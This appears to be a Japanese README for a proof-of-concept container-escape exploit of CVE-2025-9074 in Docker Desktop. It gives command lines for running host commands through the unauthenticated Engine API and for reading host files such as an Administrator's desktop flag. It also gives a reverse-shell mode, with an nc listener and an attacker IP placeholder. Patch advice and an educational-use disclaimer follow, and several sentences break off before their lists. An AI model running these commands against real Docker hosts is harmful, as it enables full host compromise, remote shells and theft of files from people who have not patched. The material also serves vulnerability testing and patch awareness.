
CVE-2025-9074 の概念実証エクスプロイト - Windows および macOS 上の Docker Desktop < 4.44.3 に影響する認証不要の Docker Engine API コンテナエスケープ (CVSS 9.3)
CVE-2025-9074 の概念実証エクスプロイト - Docker Desktop における重大なコンテナエスケープ脆弱性で、Docker Engine API への認証不要のアクセスを可能にします。
| プロパティ | 値 |
|---|---|
| CVE ID | CVE-2025-9074 |
| CVSS スコア | 9.3 (Critical) |
| 影響を受けるソフトウェア | Docker Desktop < 4.44.3 |
| 影響を受けるプラットフォーム | Windows、macOS(Linuxは影響なし) |
| 修正バージョン | Docker Desktop 4.44.3+ |
| 発見者 | Felix Boulet, Philippe Dugré |
| 発見日 | 2025年半ば |
| パッチ日 | 2025年8月20日 |
この脆弱性により、Docker Desktop上で実行されているコンテナが、http://192.168.65.7:2375 のDocker Engine APIに認証なしでアクセスできるようになります。これは以下に関係なく発生します:
Docker Engine APIがコンテナ内からアクセス可能なTCPソケット上に公開され、以下を許可していました:
pip3 install requests
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Once connected, host filesystem is at: /hostfs
# If you already have access to a container
curl http://192.168.65.7:2375/version
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]
直ちにDocker Desktop 4.44.3以降にアップデートしてください。
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
即時アップデートが不可能な場合:
このツールは教育および許可されたセキュリティテスト目的のみで提供されます。
MITライセンス - 詳細はLICENSEファイルを参照